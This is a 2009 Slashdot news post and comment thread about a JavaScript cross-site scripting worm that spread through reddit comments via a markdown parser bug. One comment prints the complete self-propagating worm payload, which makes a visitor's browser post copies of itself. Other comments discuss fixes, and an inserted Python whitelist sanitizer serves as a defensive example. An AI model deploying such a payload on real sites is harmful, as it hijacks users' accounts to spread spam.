Security IT

Reddit Javascript Exploit Spreading Virally 239

Nithendil writes "guyhersh from reddit.com describes the situation (warning: title NSFW): Based on what I've seen today, here's what went down. Reddit user Empirical wrote javascript code where if you copied and pasted it into the address bar, you would instantly spam that comment by replying to all the comments on the page and submitting it. Later xssfinder posted a proof of concept where if you hovered over a link, it would automatically run a Javascript. He then got the brilliant idea to combine the two scripts together, tested it and it spread from there."
  • Re:proof of concept (Score:4, Informative)

    by immortalpob ( 847008 ) on Monday September 28, 2009 @09:53AM (#29564995)
    This is a flaw in Reddit's comment system that allows the poster to get javascript code executed. A comment system should not allow you to use "onhover"; that is the point.
  • by corbettw ( 214229 ) on Monday September 28, 2009 @09:57AM (#29565063) Journal

    Slashdot doesn't require Javascript. If it's turned off, you get sent to the classic POST form of yesteryear.

  • Already fixed. (Score:3, Informative)

    by complete loony ( 663508 ) <Jeremy@Lakeman.gmail@com> on Monday September 28, 2009 @10:08AM (#29565183)

    KeyserSosa: Thanks for this (and thanks aedes). I'm going to steal his idea and post here as well. We've fixed a couple of underlying bugs in markdown.py, and will write a blog post for those interested once the dust settles. We've also gone through and deleted the offending comments. This exploit was a good old-fashioned worm, and its only purpose seems to have been to spread (and spread it did). The effect was limited to the site, and no user information was compromised.

    So obviously this is no longer spreading.

  • Re:NoScript (Score:1, Informative)

    by maxume ( 22995 ) on Monday September 28, 2009 @10:16AM (#29565281)

    You seem to have misunderstood what is going on. There isn't really a 'viral problem' in the browser, there is (was) a comment that would cause your browser to spam the server with copies of itself. So the problem is described as viral because it spreads to new users as they hover over an infected comment, but the problem is pretty well localized to reddit.com, and browser security is in no way compromised.

  • by Anonymous Coward on Monday September 28, 2009 @11:05AM (#29565883)

    Incidentally, I went to mod this and it failed... multiple times.

    Though it eventually worked, I am not impressed.

    It seems that Slashdot is so horribly broken and inconsistent as to be immune to such exploits.

  • by aoni782 ( 1075319 ) on Monday September 28, 2009 @11:33AM (#29566359)
    The script:

    z="[x][b]\n[b]:/["+this.innerHTML+"](/onmouseover=eval(unescape(this.innerHTML9371d7a2e3ae86a00aab4771e39d255d9371d7a2e3ae86a00aab4771e39d255d//)";o=document;e=o.getElementsByTagName('a');for(i=0;i<e.length;i++)if (e[i].innerHTML=='reply')$(e[i]).click();o=document;e=o.getElementsByTagName('textarea');for(i=0;i<e.length;i++)e[i].value=z;e=o.getElementsByTagName('button');for(i=0;i<e.length;i++)if (e[i].innerHTML=='save'&&e[i].style.display!='none')$(e[i]).click();"

  • Mod parent down (Score:3, Informative)

    by bluej100 ( 1039080 ) on Monday September 28, 2009 @12:05PM (#29566895) Homepage
    The correct solution is a whitelisted HTML parser and generator, like HTML Purifier [htmlpurifier.org].
  • by blowdart ( 31458 ) on Monday September 28, 2009 @12:43PM (#29567549) Homepage
    No it's not. The Reddit hack was a Cross Site Scripting [wikipedia.org] attack made possible by bugs in their markdown implementation which let javascript through the parser. It was not a SQL injection attack, it did not attack the database directly, no commands were run to directly put data into the database. It's an entirely different vector and an entirely different vulnerability, all the stored procedures, escaping of apostrophes and parametrised SQL in the world would not have stopped this.
  • by prockcore ( 543967 ) on Monday September 28, 2009 @01:30PM (#29568311)

    Section 501 only applies to government websites, and really, it should apply to crappy screen readers that can't handle javascript.

  • by Serious Callers Only ( 1022605 ) on Monday September 28, 2009 @02:33PM (#29569453)

    Filtering user input properly would have stopped this though. It is not an attack which relies on a flaw specific to javascript - the flaw is a very general one - using untrusted user input without aggressive filtering.

  • Re:Mod parent down (Score:2, Informative)

    by bluej100 ( 1039080 ) on Monday September 28, 2009 @02:56PM (#29569963) Homepage
    You're incorrect. HTML Purifier builds a tree of the HTML it understands and allows, then outputs a clean version of that tree. If it doesn't recognize the markup, it doesn't pass it on to the browser. I'll give $20 to the first person to show me an XSS exploit in the current version of HTML Purifier that isn't the result of an overly permissive whitelist. (Disclaimer: I use HTML Purifier and submitted the patch for CSS.AllowedProperties [htmlpurifier.org], but am in no other way associated with the project.)
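The whitelist approach immortalpob, Serious Callers Only and bluej100 describe (drop every tag and attribute you do not explicitly know, then regenerate the markup from what is left) is shown below as an added example; it is not reddit's markdown.py, HTML Purifier, or any poster's code. It assumes the sanitizer runs on the HTML the markdown renderer emits, so a renderer bug that leaks an onmouseover attribute into a link is stripped regardless. Tag and attribute lists are constructed for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Constructed whitelist: tag -> attributes allowed on it. Anything else is dropped.
ALLOWED_TAGS = {"a": {"href", "title"}, "b": set(), "i": set(), "em": set(),
                "strong": set(), "p": set(), "code": set(), "pre": set(), "br": set()}
VOID_TAGS = {"br"}
# Only these URL prefixes survive in href; javascript:/data: and friends are dropped.
SAFE_URL_PREFIXES = ("http://", "https://", "mailto:", "/")


class WhitelistSanitizer(HTMLParser):
    """Parse untrusted HTML, keep only whitelisted structure, re-emit clean markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []    # output fragments
        self.open = []   # stack of allowed tags currently open, so output is balanced

    def handle_starttag(self, tag, attrs):
        allowed = ALLOWED_TAGS.get(tag)
        if allowed is None:          # unknown tag (script, div, ...) is dropped entirely;
            return                   # its text still arrives via handle_data, escaped
        clean = []
        for name, value in attrs:    # on* handlers never pass: they are not whitelisted
            if name not in allowed or value is None:
                continue
            if name == "href" and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                continue
            clean.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(clean)}>")
        if tag not in VOID_TAGS:
            self.open.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open:         # close everything opened after the matching tag too
            while self.open:
                t = self.open.pop()
                self.out.append(f"</{t}>")
                if t == tag:
                    break

    def handle_data(self, data):     # text (including <script> bodies) is always escaped
        self.out.append(escape(data, quote=False))

    def result(self):
        while self.open:             # balance anything the author left open
            self.out.append(f"</{self.open.pop()}>")
        return "".join(self.out)


def sanitize(untrusted_html):
    parser = WhitelistSanitizer()
    parser.feed(untrusted_html)
    parser.close()
    return parser.result()
```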
  • by FatMacDaddy ( 878246 ) on Monday September 28, 2009 @03:41PM (#29570787)

    I think you're talking about Section 508 of the Americans with Disabilities Act. And yes, it can apply to more than US Government web sites. Target found that out the hard way after refusing to provide alt tags and other accessible changes to their web site. After getting slammed with a $6 million judgement, no one else is bothering to refute what has become established case law.

    I might also add that Section 508 covers much more than screen readers and javascript.
